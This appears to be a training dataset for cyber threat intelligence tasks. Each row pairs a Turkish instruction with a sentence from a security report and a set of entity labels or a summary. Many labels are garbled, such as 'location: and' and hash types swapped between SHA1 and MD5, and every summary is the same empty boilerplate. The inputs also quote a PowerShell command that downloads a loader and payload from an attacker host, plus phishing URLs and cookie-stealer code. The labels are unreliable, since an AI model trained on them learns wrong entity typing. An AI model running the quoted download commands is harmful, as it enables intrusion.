instruction
stringclasses
2 values
input
stringlengths
3
5.01k
output
stringlengths
10
5.79k
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Here is a deeper look at the campaign activity TAG has observed over the past two weeks: Curious Gorge, a group TAG attributes to China's PLA SSF, has conducted campaigns against government and military organizations in Ukraine, Russia, Kazakhstan, and Mongolia.
identity: China's PLA SSF; location: Ukraine; threat-actor: Curious Gorge; identity: TAG ; location: Kazakhstan; identity: TAG ; location: Russia; location: Mongolia
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Indicators from APT28 phishing campaign: service-reset-password-moderate-digital.rf[.]gd reset-service-identity-mail.42web[.]io digital-email-software.great-site[.]net Indicators from APT35 campaigns: Abused Google Properties: https://sites.google[.]com/view/ty85yt8tg8-download-rtih4ithr/ https://sites.google[.]com/view/user-id-568245/ https://sites.google[.]com/view/hhbejfdwdhwuhscbsb-xscvhdvbc/ Abused Dropbox Properties: https://www.dropbox[.]com/s/68y4vpfu8pc3imf/Iraq&Jewish.pdf
threat-actor: APT28; attack-pattern: phishing; location: campaign; threat-actor: APT35; URL: https://sites.google[.]com; location: view; URL: https://sites.google[.]com; location: view; URL: https://sites.google[.]com; location: view; malware: Dropbox; URL: https://www.dropbox[.]com
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Stealth was already a fixture in their operations.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 8.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
(NOTE: This exploit is not connected to the other three we’ve discussed above.)
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
These unique consistencies make it extremely improbable that two different people named these mutexes.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
In one of the first cases we encountered, the senior financial officer of a bank located in Africa purportedly sent a PDF invoice to a colleague, specifying a bank account in Hong Kong.
identity: senior financial officer; location: Africa; location: Hong Kong; identity: colleague
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Patches are available that fix this vulnerability, so Android users should get the latest updates as soon as possible.
SOFTWARE: Android
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
In our first half report, we highlight an APT group named TeamTNT that has been targeting clouds for quite a while now.
threat-actor: TeamTNT
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
One of the most common ways to do this is by displaying advertisements to users or by offering in-app purchases (IAPs).
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Tags Mobile | APT & Targeted Attacks | Research
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
After the WebKit RCE succeeds, an embedded Mach-O binary is loaded into memory, patched, and run.
SOFTWARE: WebKit
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
This finding sparked an investigation that led us to identify, with high confidence, multiple online services offered by the individuals operating the Glupteba botnet.
location: confidence; malware: Glupteba
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Accept-Encoding: gzip Connection: Keep-Alive
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Marade will check if the infected host can connect to the internet and if it is installed with anti-virus (AV) software.
malware: Marade
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
While there is still debate about how to store passwords in internal storage, if Android internal storage isn’t accessible to anything but the application that owns it, it remains secure.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Additionally, ongoing research by the industry is showing that specific actions this malware takes makes it technically infeasible, if not impossible, for recovery to occur.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
During our investigation into the Turla CyberAzov apps, we identified another Android app first seen in the wild in March 2022 that also claimed to conduct DoS attacks against Russian websites.
TIME: March 2022; malware: Turla CyberAzov apps; SOFTWARE: Android; attack-pattern: DoS; location: Russian
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Meanwhile, runHandle is responsible for the backdoor capabilities.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
These are known rogue applications of Pawn Storm that have been used in credential phishing attacks against high profile users (variants of these names are likely to have been used by Pawn Storm as well): Google Defender Google Email Protection Google Scanner Delivery Service (Yahoo) McAfee Email protection (Yahoo) For more information about Pawn Storm, check out From Espionage to Cyber Propaganda: Pawn Storm's Activities over the Past Two Years.
location: are; malware: rogue; threat-actor: Pawn Storm; attack-pattern: phishing; location: are; location: likely; threat-actor: Pawn Storm; location: Protection; identity: McAfee; location: protection; threat-actor: Pawn Storm; location: check; threat-actor: Pawn Storm
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
One of APT35’s novel techniques involves using Telegram for operator notifications.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
As soon as the user executes the malicious script in the email, a cookie stealer script will be delivered and launched on the browser.
malware: stealer; location: will; location: and
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Our researchers can show that about one-half of the samples we found have affected 15 million people worldwide.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Among these malware we have found many that are created by “mobile monetization” companies who distribute apps that provide little value but have a high cost to the user.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The shift from PE to Powershell makes it more difficult for antivirus solutions to detect.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Compromised site (received information May 2018) hxxp://www[.]peaceind[.]co[.]kr/board/icon/image.php
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
If you want a more detailed understanding of kernel APC attacks as they occurred in WanaCrypt0r/WannaCry, two good resources are Microsoft’s MMPC blog “WannaCrypt ransomware worm targets out-of-date systems” and Countercept’s “DOUBLEPULSAR Usermode Analysis: Generic Reflective DLL Loader”.
identity: Microsoft; malware: DOUBLEPULSAR; malware: WanaCrypt0r; malware: WannaCry; malware: WannaCrypt
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Alongside the threat from Russian state hackers, Putin may call upon the “patriotic” reserves of the numerous cybercrime groups operating from within the country.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Attack ChainREDBALDKNIGHT’s attacks typically use spear phishing emails as an entry point.
attack-pattern: spear phishing; location: point
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Exploiting a webmail system’s cross-site scripting (XSS) vulnerability to allow their malicious JavaScript to be injected on the webmail page permanently.
location: cross; attack-pattern: scripting; attack-pattern: XSS; location: page
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
However, if ConfuserEx is built outside Git, the version update tool will just generate the value “version-custom” as shown below.
tools: ConfuserEx; tools: Git
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
However, Palo Alto Networks users are protected from these PUAs by subscribing to WildFire and GlobalProtect services.
SOFTWARE: GlobalProtect; identity: Palo Alto Networks; SOFTWARE: WildFire
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 2.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
In particular, fake donation websites mimicking popular websites can be misleading, as described earlier.
attack-pattern: mimicking popular websites; attack-pattern: fake donation websites
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
But when legitimate programs execute illegitimate commands, it’s harder to detect and prevent: it’s not always clear whether a command is legitimate or not, and interfering with commands from legitimate programs can have significant (sometimes catastrophic) unintended consequences.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The use of an exploit for a security flaw disclosed in December 2017 and their recent activities suggest Confucius is keenly trailing their targets.
TIME: December 2017; threat-actor: Confucius
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
From a researchers' point of view, deferred free created a few problems, one of the major ones being that the page heap feature may not work correctly.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
For example, the initial ANEL version, “5.0.0 beta1,” uses a different C&C server compared to the other versions.
malware: ANEL
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
This post is also available in: 日本語 (Japanese) This Unit 42 blog provides an update on the threat situation surrounding attacks using the Petya Ransomware which are impacting organizations in Ukraine, Russia and to a lesser extent around the world.
identity: Unit 42; malware: Petya; malware: Petya Ransomware; location: Ukraine; location: Russia
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We investigated the name shown on the account but did not find any useful information other than the fact that this name is used mostly in the Ivory Coast in Africa.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Some commodity malware used included RedLine, Vidar, Predator The Thief, Nexus stealer, Azorult, Raccoon, Grand Stealer, Vikro Stealer, Masad (Google’s naming), and Kantal (Google’s naming) which shares code similarity with Vidar.
malware: stealer; location: and
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Both StealthMutant and StealthVector contain a payload of either the Cobalt Strike beacon or ScrambleCross, a newly discovered backdoor.
malware: StealthMutant; malware: ScrambleCross; malware: StealthVector; tools: Cobalt Strike
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Tens of thousands of the mutexes have been seen in only a single sample each.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Most ransomware is delivered via email with an attached archive; the ransomware is compressed in the archived files with or without password protection.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Compression headers are a feature that was added to SMBv3 negotiate context request packets in May 2019.
TIME: May 2019; SOFTWARE: SMBv3
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
This blog has been revised to include new facts that have been released since the original posting.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Previously, we uncovered two different campaigns in 2019 under the name of SLUB malware.
malware: SLUB
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
REDBALDKNIGHT’s use of steganography isn’t limited to Daserf.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 10.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
PDF.RemoteUtilities.A
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
By sharing this additional technical observation, we aim to help network defenders, as well as those likely to be targeted by APT groups (such as Sandworm), gain a more complete picture of the Cyclops Blink campaign.
threat-actor: Sandworm; campaign: Cyclops Blink campaign
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We are continuously improving our detection methods and investing in new tools and features that automatically identify and stop threats like this one.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
We’ve also seen attackers try to trick people into downloading malware by impersonating health organizations: Generally, we’re not seeing an overall rise in phishing attacks by government-backed groups; this is just a change in tactics.
location: overall; attack-pattern: phishing; identity: just
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The exploit targeted iOS versions 12.4 through 13.7.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
When you think as nation state, what should a nation state be looking at for the future?
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Trend Micro Detection 019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134 2f1a5a7411d015d01aaee4535835400191645023 Backdoor.
location: Micro; SHA1: 019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134; MD5: 2f1a5a7411d015d01aaee4535835400191645023
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The djdeeu class registers a broadcast receiver for CONNECTIVITY_CHANGE.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
At the time of our research into this threat, only the “print(1)” command is able to be executed.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
A simple RSA algorithm with very small keys encrypts the message seen above.
identity: RSA; location: small
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
SteganographyDaserf’s infection chain accordingly evolved, as shown below.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
While several top-tier RaaS affiliate programs, such as Babuk, DarkSide and REvil (aka Sodinokibi) disappeared from the underground in 2021, LockBit 2.0 continued to operate and gradually became one of the most active ransomware operations.
threat-actor: Sodinokibi; threat-actor: Babuk; threat-actor: DarkSide; threat-actor: REvil; TIME: 2021; malware: LockBit 2.0
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The attacker’s usage of a tool can be divided into two separate events: the dropping of the tool by the svchost.exe process that runs the malicious code and the execution of the tool via the scheduled task.
location: tool; location: can; location: tool; location: and; location: tool; attack-pattern: scheduled task
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Supernova, one of the malicious components associated with the attack, is a .NET web shell backdoor that presents itself as a legitimate SolarWinds web service handler.
tools: Supernova; location: one; attack-pattern: web shell; identity: SolarWinds; attack-pattern: web service
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
In this case, the attack script will show an alert prompt with a message that reads “Your Flash version is too low, please install the latest version and try again!” and then redirects the victim to the fake Flash installer download website they control.
malware: attack script
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The DLL is custom malware that would immediately begin communicating with actor-controlled C2 domains.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Stay tuned for more upcoming blogs on how XDR will help improve our overall security strategy moving forward.
SOFTWARE: XDR
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
{ try { JsonInfo jsonInfo = pipeCommunication.Read(); switch (jsonInfo.Type) { case JsonType.GetCookies: jsonInfo.Data = this.CookieText; pipeCommunication.Write(jsonInfo); break; case JsonType.TakeOutFile: flag = true; break; case JsonType.GetUsername: while (this.OperationObject.GetUsername() == null) { Thread.Sleep(1000); }
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
It uses Writing Style DNA to detect BEC impersonations and computer vision to find credential-stealing phishing sites.
attack-pattern: phishing; attack-pattern: credential-stealing
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
As of July 7, this includes 85.8% of active Android devices.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
However, a number of strong issues still plague this malware family, such as the following: While this version is an improvement, it still lacks many of the features and stealth that are currently present in the larger ransomware families.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
There are many common mutexes shared across both benign software and malware.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Appendix A Additional Resources
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We disclosed our findings to PrismRBS.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
A little over two weeks before the registration of the fake domain, the attackers sent the following email to the company: Figure 6.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
It defines seven message types, shown in Figure 4.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The function that initializes the modules In Figure 1, we inferred the following mod_t structure: Figure 2.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Our Wildfire analysis cloud captured the initial app and identified it as Scareware.
SOFTWARE: Wildfire
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The Gh0st RAT samples related to this campaign are obfuscated executable files, which decrypt the main payload in memory and execute its main export function named “Shellex.” Figure
FILEPATH: Shellex; malware: Gh0st RAT
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
During our investigation, we found evidence of specific tools, which we listed in Table 1.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We terminated 5 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to Russia.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 17.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
View active directory objects dsquery.exe DsQuery
location: View; malware: dsquery.exe; malware: DsQuery
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
For example, “autoproto_*” -- More than 20 mutexes share that preface, offering a natural fingerprint.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The malware will periodically poll the C2 server and determine if any commands are received.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
We’ve terminated around 63M Google Docs observed to have distributed Glupteba, 1,183 Google Accounts, 908 Cloud Projects, and 870 Google Ads accounts associated with their distribution.
SOFTWARE: Google Ads; SOFTWARE: Google Docs; malware: Glupteba
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Additional “fun app” applications, all contain the Funtasy Trojan.
identity: fun app; malware: Funtasy
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Let's continue this conversation because when we talk we all get better and more secure online.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Palo Alto Networks customers receive protections against the OctoberCMS vulnerability in the following ways: Palo Alto Networks customers receive protections against WhisperGate malware in the following ways: The Cortex XSOAR "WhisperGate & CVE-2021-32648'' pack can help automatically detect and mitigate the two threats.
identity: Palo Alto Networks; SOFTWARE: Cortex XSOAR; vulnerability: CVE-2021-32648; identity: Palo Alto Networks; vulnerability: OctoberCMS vulnerability; malware: WhisperGate; malware: WhisperGate
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
To run the exploit in our virtual environment, we decided to write a loader in Python which did the following: For our payload, we wrote a simple bash script which runs id and pipes the result to a file in /tmp.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
PDF with embedded URLs 468e331fd3f9c41399e3e90f6fe033379ab69ced5e11b35665790d4a4b7cf254 Trojan.W97M.RemoteUtilities.A RTF with embedded URLs
SHA2: 468e331fd3f9c41399e3e90f6fe033379ab69ced5e11b35665790d4a4b7cf254
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
This would allow an organization to get visibility into the entire attack lifecycle, including infiltration, lateral movement, and exfiltration.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
On account-trading markets, hijacked channels ranged from $3 USD to $4,000 USD depending on the number of subscribers.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
They also conduct corporate espionage, handily obscuring their clients’ role.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
This prompted us to dig deeper.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Increased Utilization
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
COLDRIVER, a Russian-based threat actor sometimes referred to as Callisto, continues to send credential phishing emails to targets including government and defense officials, politicians, NGOs and think tanks, and journalists.
threat-actor: Callisto; threat-actor: COLDRIVER; attack-pattern: send credential phishing emails
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Tools that exploited vulnerabilities in Internet of Things (IoT) devices were also made available on GitHub.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The blog post describes a web shell with two components — a PHP script and an HTML uploading file — however, the second one is not needed as the proper POST request can be created with any custom or third-party tool (e.g., Fiddler). Figure 6.
tools: web shell; tools: PHP script ; tools: HTML uploading file
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
After the threat actors get access to the vulnerable hosts by using ProxyLogon exploits and web shells, they use bitsadmin to download the next-stage loader (loaders are detected as Nerapack) as well as its payload file (.bin). C:\Windows\system32\windowspowershell\v1.0\powershell.exe -Command "&{Import-Module BitsTransfer; Start-BitsTransfer 'http://<redacted>:8000/dfmanager.exe' "%temp%/dfmanager.exe"}" C:\Windows\system32\windowspowershell\v1.0\powershell.exe -Command "&{Import-Module BitsTransfer; Start-BitsTransfer 'http://<redacted>:8000/dfmanager.bin' "C:\Users\<redacted>\AppData\Local\Temp/dfmanager.bin"}"
attack-pattern: web shells; FILEPATH: %temp%/dfmanager.exe; URL: C:\Users\<redacted>\AppData\Local\Temp/dfmanager.bin; FILEPATH: C:\Windows\system32\windowspowershell\v1.0\powershell.exe; tools: bitsadmin; malware: Nerapack; threat-actor: threat actors; FILEPATH: C:\Windows\system32\windowspowershell\v1.0\powershell.exe; URL: http://<redacted>:8000/dfmanager.exe; vulnerability: ProxyLogon exploits; URL: http://<redacted>:8000/dfmanager.bin
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Google Safe Browsing helps protect over four billion devices every day by showing warnings to users when they attempt to navigate to unsafe sites or download harmful files.
SOFTWARE: Google Safe Browsing